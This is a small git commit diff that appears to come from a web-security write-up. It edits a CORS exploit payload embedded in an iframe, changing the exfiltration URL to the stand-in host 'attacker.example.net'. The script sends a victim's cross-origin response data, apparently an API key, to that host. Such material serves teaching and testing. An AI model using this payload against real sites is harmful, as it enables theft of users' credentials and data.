Some clarification in the exploit code

This commit is contained in:
Emanuel Duss 2020-04-12 14:38:52 +02:00
parent 4537555714
commit 48fcdeb7ca

View file

@ -112,7 +112,7 @@ origin in the request:
req.send();
function reqListener() {
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
```